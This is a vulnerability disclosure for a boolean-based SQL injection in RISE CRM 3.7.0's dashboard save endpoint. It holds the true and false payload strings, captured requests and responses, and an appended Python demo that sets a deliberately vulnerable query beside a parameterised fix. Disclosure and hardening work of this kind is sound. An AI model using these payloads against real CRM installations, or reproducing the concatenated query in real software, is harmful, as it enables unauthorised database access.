Submit #409096: FairSketch RISE - Ultimate Project Manager & CRM 3.7.0 SQL Injection

Title: FairSketch RISE - Ultimate Project Manager & CRM 3.7.0 SQL Injection

Description: A critical SQL Injection vulnerability was discovered in RISE CRM version 3.7.0. The vulnerability requires an attacker to be authenticated as a client, but it is significantly easier to exploit if user/client signup is enabled. The vulnerability arises due to improper sanitization of user input in the id parameter of the /dashboard/save endpoint, allowing attackers to inject SQL commands. This could lead to data leakage, unauthorized database access, or full application compromise. The issue has been fixed in version 3.7.1.

Proof of Concept (PoC): Here’s an example of the SQL injection payload used in the id parameter.

1. Successful payload (-1 OR 1=1--): This payload returns a true condition and produces a valid response from the application.

    POST /index.php/dashboard/save HTTP/1.1
    Host: 192.168.1.13
    Content-Length: 69
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.13
    Referer: http://192.168.1.13/crm/index.php/dashboard/index/1
    Accept-Encoding: gzip, deflate, br
    Cookie: ci_session=d4oi0jg15o1ur64cn39f2daqe24p5rpd; rise_csrf_cookie=c54966034a07055643098839120e2146
    Connection: keep-alive

Response:

    HTTP/1.1 200 OK
    . . .
    Content-Length: [Size]

    {"success":true,"dashboard_id":"-1 OR 1=1-- -","message":"The record has been saved."}

2. Failed payload (-1 OR 1=2--): This payload evaluates as false and produces a different response, confirming the SQL Injection vulnerability.

    POST /index.php/dashboard/save HTTP/1.1
    Host: 192.168.1.13
    Content-Length: 69
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.13
    Referer: http://192.168.1.13/crm/index.php/dashboard/index/1
    Accept-Encoding: gzip, deflate, br
    Cookie: ci_session=d4oi0jg15o1ur64cn39f2daqe24p5rpd; rise_csrf_cookie=c54966034a07055643098839120e2146
    Connection: keep-alive

Response:

    HTTP/1.1 302 Found
    . . .
    Content-Length: 0

Impact:
- Data leakage
- Unauthorized database access
- Full compromise of the application
Source: https://bytium.com/sql-injection-vulnerability-identified-in-rise-crm/
User: suffer (UID 74855)
Submission: 09/16/2024 22:07 (2 years ago)
Moderation: 09/17/2024 14:34 (16 hours later)
Status: Accepted
VulDB entry: 277762 [CodeCanyon RISE Ultimate Project Manager 3.7.0 save ID sql injection]
Points: 20
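
The true/false response difference described in the submission, and how strict integer validation plus a bound parameter removes it, shown as an added example that is not part of the original submission and is not RISE CRM's code. The table schema, the function names and the 400 rejection status are assumptions; the two payload strings and the 200/302 responses are the ones quoted above.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data; the schema is hypothetical, not RISE's."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dashboards (id INTEGER PRIMARY KEY, user_id INTEGER)")
    db.executemany("INSERT INTO dashboards VALUES (?, ?)", [(1, 10), (2, 20)])
    return db

def save_vulnerable(db, user_id, raw_id):
    """Model of the flaw: the id value is concatenated into the SQL text."""
    sql = f"SELECT id FROM dashboards WHERE user_id = ? AND id = {raw_id}"
    row = db.execute(sql, (user_id,)).fetchone()
    if row is None:
        return 302, None  # no matching record: redirect with empty body
    return 200, {"success": True, "dashboard_id": raw_id}

def save_hardened(db, user_id, raw_id):
    """Accept only a decimal integer id, then bind it as a parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return 400, None  # assumed rejection status for a malformed id
    row = db.execute(
        "SELECT id FROM dashboards WHERE user_id = ? AND id = ?",
        (user_id, int(raw_id)),
    ).fetchone()
    if row is None:
        return 302, None
    return 200, {"success": True, "dashboard_id": row[0]}

if __name__ == "__main__":
    db = make_db()
    # Payload strings as quoted in the submission, plus one legitimate id.
    for value in ("-1 OR 1=1--", "-1 OR 1=2--", "1"):
        print(repr(value),
              "vulnerable:", save_vulnerable(db, 10, value)[0],
              "hardened:", save_hardened(db, 10, value)[0])
```

In the hardened handler both quoted payloads get the same response, so the status code no longer reveals how the injected condition evaluated.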
